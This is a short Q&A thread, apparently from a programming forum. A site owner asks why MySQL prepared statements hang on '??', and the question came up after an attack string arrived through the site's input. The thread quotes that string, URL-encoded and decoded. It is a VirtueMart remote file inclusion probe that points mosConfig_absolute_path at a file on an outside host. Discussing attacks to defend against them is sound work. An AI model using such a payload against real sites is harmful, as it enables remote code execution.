tags:

views:

89

answers:

2

I recently had an attack on my site and the attacker tried to alter one of my SQL statements, by adding the following string

%2f%2fcomponents%2fcom%5fvirtuemart%2fshow%5fimage%5fin%5fimgtag%2ephp%3fmosConfig%5fabsolute%5fpath%3dhttp%3a%2f%2fwww%2ekwangsung%2ees%2ekr%2f%2fUserFiles%2fshirohige%2fzfxid%2etxt

to a value.

Anyways, I don't use PHP or whatever this happened to be, but, the %3f%3f caused a problem: in MySQL prepare statement call, the double ?s hang.

Anyone else ran into this issue with double ?s before? I checked MySQL site and didn't find anything.

+1  A: 

This isn't a SQL injection attack, it appears to be a probe to see if you were vulnerable to some sort of "virtuemart" vulnerability.

//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt

Regardless of what language you use, you shouldn't be passing arbitrary GET data to your SQL queries. You need to implement some type of server side validation, as well as ensure your queries properly escape all user defined input.

hobodave
A: 

Sorry, I posted this question on another browser elsewhere using an unregistered account.

I did forget a %3f%3f at the end of the string I included.

No it's not an injection attack, it's some attack on some PHP program which I don't use, but the attacker tried anyways.

I am using C++ bindings to MySQL, way down in the stack. The prepare statement hang with "??" I can verify this with other queries, not just the one I got via the attack.

I am taking in inputs and putting that in the query, but my platform automatically escapes <>&"' characters for all CGI inputs, and I am doing additional checks elsewhere for injection. This is actually legacy code. Newer version of the platform only allows parameterized SQLs, and only via a RPC to the database so you can only access certain tables and rows exposed by the RPC. So technically I won't have this problem anymore, but I am still curious why the "??" seems to hang.

Thanks.

OverClocked